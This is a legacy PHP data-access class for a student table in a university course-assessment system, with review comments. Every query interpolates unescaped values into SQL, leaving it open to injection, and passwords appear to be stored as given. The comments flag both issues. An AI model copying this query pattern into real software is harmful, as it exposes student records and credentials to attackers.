<?php
//--Class StudentAssess--------------------------
//--PK of StudentAssess ::
//    1. studentId

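//--Data-access class for the StudentAssess table (primary key: studentId).
//--Query execution is delegated to SetQuery(), GetResult() and Dml(), which
//--are not defined in this class (presumably inherited from clsDB -- confirm).
//--
//--NOTE(review), security -- applies to every method below:
//--  * Each statement is built by interpolating object properties or method
//--    arguments directly into the SQL text. Nothing in this class escapes,
//--    casts or validates those values, so a value that originates from a
//--    request can change the statement (SQL injection) unless every caller
//--    or clsDB sanitises it first. Neither is visible here -- confirm.
//--    The durable fix is bound parameters in the clsDB query layer; adding
//--    escaping here without knowing what callers already do risks
//--    double-escaping, so the query text is left unchanged.
//--  * studentPassword is written to and read from the table exactly as
//--    given. Whether it is hashed before it reaches this class is not
//--    visible here; if it is not, passwords are stored in clear text.
class StudentAssess extends clsDB{

    //--Row most recently fetched by GetRecord().
    var $result;

    //--One property per StudentAssess column.
    var $studentId;
    var $studentCode;
    var $levelName;
    var $programName;
    var $prefixName;
    var $studentName;
    var $studentSurname;
    var $studentPassword;   // NOTE(review): see class header about password storage
    var $studentYear;

    //--PHP 4-style constructor (method named after the class); PHP 8 no
    //--longer treats such a method as a constructor.
    //--Copies the `c` and `db` members of the passed object onto this one.
    //--$this->c and $this->DB are not declared in this class (presumably
    //--declared in clsDB -- confirm).
    function StudentAssess(&$c){
        $this->c=$c->c;
        $this->DB=$c->db;
    }

    //--Inserts or updates the row held in this object and returns whatever
    //--Dml() returns.
    //--$this->status selects the statement -- 1: new data (insert),
    //--anything else: existing data (update by studentId).
    //--$this->status is not declared in this class (presumably in clsDB).
    //--NOTE(review): the insert relies on column order (no column list), and
    //--all nine values are interpolated unescaped.
    function Save(){
        if ($this->status==1){
            //uncomment a line below if your table use ID as running number
            //$this->studentId=$this->GetNextCode();
            $sql = "insert into StudentAssess values(
            '$this->studentId',
             '$this->studentCode',
             '$this->levelName',
             '$this->programName',
             '$this->prefixName',
             '$this->studentName',
             '$this->studentSurname',
             '$this->studentPassword',
             '$this->studentYear'
            )";
        }else {
            $sql = "update StudentAssess set 
            studentCode='$this->studentCode', 
            levelName='$this->levelName', 
            programName='$this->programName', 
            prefixName='$this->prefixName', 
            studentName='$this->studentName', 
            studentSurname='$this->studentSurname', 
            studentPassword='$this->studentPassword', 
            studentYear='$this->studentYear' 
            where studentId='$this->studentId'";
        }
        return $this->Dml($sql);
    }

    //--Deletes the record currently loaded in the object, one record at a time.
    //--Methods must be called in this order: SearchByKey()-->GetRecord()-->Delete()
    function Delete(){
        return $this->Dml("delete from StudentAssess where studentId='$this->studentId'");
    }

    //--Finds the highest value of the key field and returns it plus one
    //--(auto-increment style).
    //--The key must be an integer field and must not be entered by hand on screen.
    //--Returns nothing (null) when GetResult() yields a falsy value.
    //--NOTE(review): max()+1 is not atomic; two concurrent inserts can compute
    //--the same id unless the caller serialises them.
    function GetNextCode(){
        $this->SetQuery("select max(studentId) as num from StudentAssess");
        if ($result=$this->GetResult()) {
            return $result['num']+1;
        }
    }

    //--Methods whose name starts with RS (ResultSet) select more than one record.
    //--GetRecord() must always be called afterwards to load each row into the object.
    //--More methods may be added as needed, but their names must start with RS.
    //--This one selects every row ordered by studentId.
    function RSStudentAssess(){
        $this->SetQuery("select * from StudentAssess order by studentId");
    }

    //--Copies the next row of the ResultSet into the object's attributes.
    //--Each call to GetRecord() advances the record pointer by one record.
    //--Returns 1 when a row was loaded, 0 when GetResult() returned a falsy value.
    function GetRecord(){
        if ($this->result = $this->GetResult()) {
            $this->studentId = $this->result['studentId'];
            $this->studentCode = $this->result['studentCode'];
            $this->levelName = $this->result['levelName'];
            $this->programName = $this->result['programName'];
            $this->prefixName = $this->result['prefixName'];
            $this->studentName = $this->result['studentName'];
            $this->studentSurname = $this->result['studentSurname'];
            $this->studentPassword = $this->result['studentPassword'];
            $this->studentYear = $this->result['studentYear'];
            return 1;
        }else {
            return 0;
        }
    }

    //--Searches by primary key; the parameter is required and the call must
    //--always be followed by GetRecord().
    //--Returns 1 when SetQuery() returns a truthy value, otherwise 0.
    //--NOTE(review): $xKey is interpolated unescaped.
    function SearchByKey($xKey){
        if ($this->SetQuery("select * from StudentAssess where studentId= '$xKey'")){
            return 1;
        }else {
            return 0;
        }
    }
    //****************** You can add new functions below **********************//

    //--Searches by studentCode. Returns 1 when SetQuery() returns a truthy
    //--value, otherwise 0.
    //--NOTE(review): $xKey is interpolated unescaped. If this lookup feeds a
    //--login check (not visible here), it is the first place to parameterise.
    function SearchByStCodeAndStudying($xKey){
        if ($this->SetQuery("select * from StudentAssess where studentCode='$xKey'")){
            return 1;
        }else {
            return 0;
        }
    }

    //--Returns the `num` column of a count of rows with the given studentYear.
    function CountStdBystdYearAss($xstudentYear){
        $this->SetQuery("select count(studentYear) as num  from StudentAssess  where studentYear = '$xstudentYear'");
        $result = $this->GetResult();
        return $result['num'];
    }

    //--Returns the `num` column of a count of rows matching both the given
    //--programName and studentYear.
    function CountStdByProgramNameStdYearAss($xprogramName,$studentYear){
        $this->SetQuery("select count(programName) as num  from StudentAssess  where programName = '$xprogramName' and studentYear = '$studentYear' ");
        $result = $this->GetResult();
        return $result['num'];
    }

    //--Returns the number of distinct registered students for an academic
    //--year and semester, restricted by ClassAssess.studentYear and a LIKE
    //--match on ClassAssess.programId.
    //--NOTE(review): the argument is named $xprogramName but is compared with
    //--ca.programId -- confirm which value callers pass. Because it is used
    //--with LIKE, any % or _ in it acts as a wildcard.
    function CountStdByAcYSePgIdStdY($xacadYear, $xsemester, $xprogramName,$xstudentYear){
        $this->SetQuery("SELECT count( DISTINCT (reg.studentId) ) as num
                                FROM eassess.Registration reg
                                JOIN eassess.ClassAssess ca ON reg.classId = ca.classId
                                JOIN eassess.StudentAssess sa ON reg.studentId = sa.studentId
                                WHERE reg.acadYear = '$xacadYear'
                                    AND reg.semester = '$xsemester'
                                    AND ca.studentYear = '$xstudentYear'
                                    AND ca.programId LIKE  '$xprogramName' ");
        $result = $this->GetResult();
        return $result['num'];
    } // bank create - -/11/2552

    //--Returns the number of distinct registered students for an academic
    //--year. A semester or studentYear argument of '%' means "do not filter
    //--on this column"; any other value adds an equality condition.
    //--NOTE(review): the optional conditions are concatenated into the
    //--statement unescaped, like the rest of the query.
    function CountHstdRegis($xacadYear, $xsemester, $xstudentYear){
        $cond = '';
        $cond.= ($xsemester!='%')? " AND reg.semester = '$xsemester'" : '' ;
        $cond.= ($xstudentYear!='%')? " AND ca.studentYear = '$xstudentYear'" : '' ;
        $sql = "SELECT count( DISTINCT (reg.studentId) ) as num
            FROM eassess.Registration reg
            JOIN eassess.ClassAssess ca ON reg.classId = ca.classId
            JOIN eassess.StudentAssess sa ON reg.studentId = sa.studentId
            WHERE reg.acadYear = '$xacadYear'
            $cond ";
        //            echo $sql;
        $this->SetQuery($sql);
        $result = $this->GetResult();
        return $result['num'];
    } // bank create - -/08/2553

    //--Deletes EVERY row of StudentAssess (no WHERE clause) and returns
    //--whatever Dml() returns.
    //--NOTE(review): nothing here checks who is calling; make sure every
    //--caller restricts this to an authorised administrative path.
    function DeleteStudentAssess(){
        return $this->Dml("delete from StudentAssess");
    }

    // closeDate
    //--Selects rows whose studentCode, studentName and studentSurname each
    //--contain the given text, ordered by studentCode. Follow with GetRecord().
    //--NOTE(review): besides being unescaped, % and _ inside the arguments
    //--act as LIKE wildcards, and an empty argument matches every row.
    function RSStudentAssessByStCodeAndStNameAndStSurname($stCode, $stName, $stSurname){
        $this->SetQuery("select * from StudentAssess 
                                        where studentCode like '%$stCode%' and  studentName like '%$stName%' and  studentSurname like '%$stSurname%' 
                                        order by studentCode");
    }

    //--Selects one row per programName. Follow with GetRecord().
    //--NOTE(review): select * with GROUP BY on a single column returns an
    //--arbitrary row per group on engines that allow it and is rejected by
    //--strict SQL modes; only programName is reliable in the result.
    function RSStudentAssessGroupPgName(){
        $this->SetQuery("select * from StudentAssess group by programName");
    }

    // start repCloseDateOfficer, Course
    //--The GetNotAssess* methods all share one shape: an inner select (tb1)
    //--lists students of a program together with what they should assess,
    //--a LEFT JOIN to the assessment table (tb2) is filtered on "tb2 IS NULL",
    //--and the result is the students with no matching assessment row,
    //--ordered by studentCode. The meaning of the FlagN number in each name
    //--is not visible in this file. All arguments are interpolated unescaped.

    //--Students of a program registered for a year/semester/course in a class
    //--taught by the given officer, with no DoAssessment row for that
    //--define id, course and officer.
    function GetNotAssessFlag0ByPgNameAndAcYAndSeAndCoIdAndDeIdAndOfId($pgName, $acY, $se, $coId, $deId, $ofId){
        $this->SetQuery("select distinct(tb1.studentCode), tb1.prefixName, tb1.studentName, tb1.studentSurname from 
                                        (
                                            select distinct(ci.officerId), s.* from StudentAssess s, Registration r, ClassAssess cl, ClassInStructorAssess ci 
                                            where s.programName = '$pgName'
                                            and s.studentId = r.studentId
                                            and r.acadYear = '$acY'
                                            and r.semester = '$se'
                                            and r.courseId = '$coId'
                                            and r.classId = cl.classId
                                            and cl.classId = ci.classId
                                            and ci.officerId = '$ofId'
                                        ) tb1
                                        LEFT JOIN (
                                            select * from DoAssessment 
                                            where defineid = '$deId'
                                            and courseId = '$coId'
                                            and officerId = '$ofId'
                                        ) tb2 
                                        ON tb1.studentId=tb2.studentId and tb1.officerId=tb2.officerId
                                        where tb2.studentId IS NULL and tb2.officerId IS NULL 
                                        order by tb1.studentCode");
    }

    //--As the Flag0 variant above, but the class must also have a HoldCourse
    //--row for the given define id.
    function GetNotAssessFlag1ByPgNameAndAcYAndSeAndCoIdAndDeIdAndOfId($pgName, $acY, $se, $coId, $deId, $ofId){
        $this->SetQuery("select distinct(tb1.studentCode), tb1.prefixName, tb1.studentName, tb1.studentSurname from 
                                        (
                                            select distinct(ci.officerId), s.* from StudentAssess s, Registration r, ClassAssess cl, HoldCourse h, ClassInStructorAssess ci 
                                            where s.programName = '$pgName'
                                            and s.studentId = r.studentId
                                            and r.acadYear = '$acY'
                                            and r.semester = '$se'
                                            and r.courseId = '$coId'
                                            and r.classId = cl.classId
                                            and cl.classId = h.classId
                                            and h.defineid = '$deId'
                                            and cl.classId = ci.classId
                                            and ci.officerId = '$ofId'
                                        ) tb1
                                        LEFT JOIN (
                                            select * from DoAssessment 
                                            where defineid = '$deId'
                                            and courseId = '$coId'
                                            and officerId = '$ofId'
                                        ) tb2 
                                        ON tb1.studentId=tb2.studentId and tb1.officerId=tb2.officerId
                                        where tb2.studentId IS NULL and tb2.officerId IS NULL 
                                        order by tb1.studentCode");
    }

    //--Students of a program registered for a year/semester/course with no
    //--DoAssessment row (officerId = 0) for that define id, course and class.
    function GetNotAssessFlag5ByPgNameAndAcYAndSeAndCoIdAndDeId($pgName, $acY, $se, $coId, $deId){
        $this->SetQuery("select distinct(tb1.studentCode), tb1.prefixName, tb1.studentName, tb1.studentSurname from 
                                        (
                                            select distinct(r.classId), s.* from StudentAssess s, Registration r 
                                            where s.programName = '$pgName'
                                            and s.studentId = r.studentId
                                            and r.acadYear = '$acY'
                                            and r.semester = '$se'
                                            and r.courseId = '$coId'
                                        ) tb1
                                        LEFT JOIN (
                                            select * from DoAssessment 
                                            where defineid = '$deId'
                                            and courseId = '$coId'
                                            and officerId = 0
                                        ) tb2 
                                        ON tb1.studentId=tb2.studentId and tb1.classId=tb2.classId
                                        where tb2.studentId IS NULL and tb2.classId IS NULL 
                                        order by tb1.studentCode");
    }

    //--As the Flag5 variant above, but the class must also have a HoldCourse
    //--row for the given define id.
    function GetNotAssessFlag6ByPgNameAndAcYAndSeAndCoIdAndDeId($pgName, $acY, $se, $coId, $deId){
        $this->SetQuery("select distinct(tb1.studentCode), tb1.prefixName, tb1.studentName, tb1.studentSurname from 
                                        (
                                            select distinct(h.classId), s.* from StudentAssess s, Registration r, ClassAssess cl, HoldCourse h 
                                            where s.programName = '$pgName'
                                            and s.studentId = r.studentId
                                            and r.acadYear = '$acY'
                                            and r.semester = '$se'
                                            and r.courseId = '$coId'
                                            and r.classId = cl.classId
                                            and cl.classId = h.classId
                                            and h.defineid = '$deId'
                                        ) tb1
                                        LEFT JOIN (
                                            select * from DoAssessment 
                                            where defineid = '$deId'
                                            and courseId = '$coId'
                                            and officerId = 0
                                        ) tb2 
                                        ON tb1.studentId=tb2.studentId and tb1.classId=tb2.classId
                                        where tb2.studentId IS NULL and tb2.classId IS NULL 
                                        order by tb1.studentCode");
    }
    // end repCloseDateOfficer, Course

    // start repCloseDateAssessForm
    //--Students of a program registered for a year/semester, paired with each
    //--officer of their classes, with no DoAssessment row for the define id.
    //--Arguments are interpolated unescaped.
    function GetNotAssessFlag0ByPgNameAndAcYAndSeAndDeId($pgName, $acY, $se, $deId){
        $this->SetQuery("select distinct(tb1.studentCode), tb1.prefixName, tb1.studentName, tb1.studentSurname from 
                                        (
                                            select distinct(ci.officerId), s.* from StudentAssess s, Registration r, ClassAssess cl, ClassInStructorAssess ci 
                                            where s.programName = '$pgName'
                                            and s.studentId = r.studentId
                                            and r.acadYear = '$acY'
                                            and r.semester = '$se'
                                            and r.classId = cl.classId
                                            and cl.classId = ci.classId
                                        ) tb1
                                        LEFT JOIN (
                                            select * from DoAssessment 
                                            where defineid = '$deId'
                                        ) tb2 
                                        ON tb1.studentId=tb2.studentId and tb1.officerId=tb2.officerId
                                        where tb2.studentId IS NULL and tb2.officerId IS NULL 
                                        order by tb1.studentCode");
    }

    //--As the Flag0 variant above, but the class must also have a HoldCourse
    //--row for the given define id. Arguments are interpolated unescaped.
    function GetNotAssessFlag1ByPgNameAndAcYAndSeAndDeId($pgName, $acY, $se, $deId){
        $this->SetQuery("select distinct(tb1.studentCode), tb1.prefixName, tb1.studentName, tb1.studentSurname from 
                                        (
                                            select distinct(ci.officerId), s.* from StudentAssess s, Registration r, ClassAssess cl, HoldCourse h, ClassInStructorAssess ci 
                                            where s.programName = '$pgName'
                                            and s.studentId = r.studentId
                                            and r.acadYear = '$acY'
                                            and r.semester = '$se'
                                            and r.classId = cl.classId
                                            and cl.classId = h.classId
                                            and h.defineid = '$deId'
                                            and cl.classId = ci.classId
                                        ) tb1
                                        LEFT JOIN (
                                            select * from DoAssessment 
                                            where defineid = '$deId'
                                        ) tb2 
                                        ON tb1.studentId=tb2.studentId and tb1.officerId=tb2.officerId
                                        where tb2.studentId IS NULL and tb2.officerId IS NULL 
                                        order by tb1.studentCode");
    }

    //--Students of a program registered for a year/semester with no
    //--DoAssessment row (officerId = 0) for the define id and class.
    //--Arguments are interpolated unescaped.
    function GetNotAssessFlag5ByPgNameAndAcYAndSeAndDeId($pgName, $acY, $se, $deId){
        $this->SetQuery("select distinct(tb1.studentCode), tb1.prefixName, tb1.studentName, tb1.studentSurname from 
                                        (
                                            select distinct(r.classId), s.* from StudentAssess s, Registration r 
                                            where s.programName = '$pgName'
                                            and s.studentId = r.studentId
                                            and r.acadYear = '$acY'
                                            and r.semester = '$se'
                                        ) tb1
                                        LEFT JOIN (
                                            select * from DoAssessment 
                                            where defineid = '$deId'
                                            and officerId = 0
                                        ) tb2 
                                        ON tb1.studentId=tb2.studentId and tb1.classId=tb2.classId
                                        where tb2.studentId IS NULL and tb2.classId IS NULL 
                                        order by tb1.studentCode");
    }

    //--As the Flag5 variant above, but the class must also have a HoldCourse
    //--row for the given define id. Arguments are interpolated unescaped.
    function GetNotAssessFlag6ByPgNameAndAcYAndSeAndDeId($pgName, $acY, $se, $deId){
        $this->SetQuery("select distinct(tb1.studentCode), tb1.prefixName, tb1.studentName, tb1.studentSurname from 
                                        (
                                            select distinct(h.classId), s.* from StudentAssess s, Registration r, HoldCourse h 
                                            where s.programName = '$pgName'
                                            and s.studentId = r.studentId
                                            and r.acadYear = '$acY'
                                            and r.semester = '$se'
                                            and r.classId = h.classId
                                            and h.defineid = '$deId'
                                        ) tb1
                                        LEFT JOIN (
                                            select * from DoAssessment 
                                            where defineid = '$deId'
                                            and officerId = 0
                                        ) tb2 
                                        ON tb1.studentId=tb2.studentId and tb1.classId=tb2.classId
                                        where tb2.studentId IS NULL and tb2.classId IS NULL 
                                        order by tb1.studentCode");
    }

    //--Students of a program whose studentYear has a HoldStudent row for the
    //--define id, with no DoAssessmentHStd row for that define id and year.
    //--Arguments are interpolated unescaped.
    function GetNotAssessFlag2ByPgNameAndDeId($pgName, $deId){
        $this->SetQuery("select distinct(tb1.studentCode), tb1.prefixName, tb1.studentName, tb1.studentSurname from 
                                        (
                                            select s.* from StudentAssess s, HoldStudent h 
                                            where s.programName = '$pgName'
                                            and s.studentYear = h.stdYearAss
                                            and h.defineid = '$deId'
                                        ) tb1
                                        LEFT JOIN (
                                            select * from DoAssessmentHStd 
                                            where defineid = '$deId'
                                        ) tb2 
                                        ON tb1.studentId=tb2.studentId and tb1.studentYear=tb2.stdYearAss
                                        where tb2.studentId IS NULL and tb2.stdYearAss IS NULL 
                                        order by tb1.studentCode");
    }

    //--As the Flag2 variant above, but matched against HoldProgram and also
    //--restricted to the given programId. Arguments are interpolated unescaped.
    function GetNotAssessFlag3ByPgNameAndDeIdAndPgId($pgName, $deId, $pgId){
        $this->SetQuery("select distinct(tb1.studentCode), tb1.prefixName, tb1.studentName, tb1.studentSurname from 
                                        (
                                            select s.* from StudentAssess s, HoldProgram h 
                                            where s.programName = '$pgName'
                                            and s.studentYear = h.stdYearAss
                                            and h.defineid = '$deId'
                                            and h.programId = '$pgId'
                                        ) tb1
                                        LEFT JOIN (
                                            select * from DoAssessmentHStd 
                                            where defineid = '$deId'
                                        ) tb2 
                                        ON tb1.studentId=tb2.studentId and tb1.studentYear=tb2.stdYearAss
                                        where tb2.studentId IS NULL and tb2.stdYearAss IS NULL 
                                        order by tb1.studentCode");
    }
    // end repCloseDateAssessForm

    //--Students of a program registered for a year/semester in a class with a
    //--HoldCourse row for the define id, paired with the officer (ttOfId) and
    //--timetable entry of that row, with no DoAssessment row for the same
    //--student, officer and timetable entry.
    //--Arguments are interpolated unescaped.
    function GetNotAssessFlag7ByPgNameAndAcYAndSeAndDeId($pgName, $acY, $se, $deId){
        $this->SetQuery("select distinct(tb1.studentCode), tb1.prefixName, tb1.studentName, tb1.studentSurname from 
                    (
                    select distinct(tt.ttOfId) as officerId, tt.ttId, s.* from StudentAssess s, Registration r, ClassAssess cl, HoldCourse h, TimetableAssess tt 
                    where s.programName = '$pgName'
                        and s.studentId = r.studentId
                        and r.acadYear = '$acY'
                        and r.semester = '$se'
                        and r.classId = cl.classId
                        and cl.classId = h.classId
                        and h.defineid = '$deId'
                        and h.ttId = tt.ttId
                    ) tb1
                    LEFT JOIN (
                    select * from DoAssessment 
                    where defineid = '$deId'
                    ) tb2 
                    ON tb1.studentId=tb2.studentId and tb1.officerId=tb2.officerId and tb1.ttId=tb2.ttId
                    where tb2.studentId IS NULL and tb2.officerId IS NULL and tb2.ttId IS NULL 
                    order by tb1.studentCode");
    }

} //--End class StudentAssess--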

?>
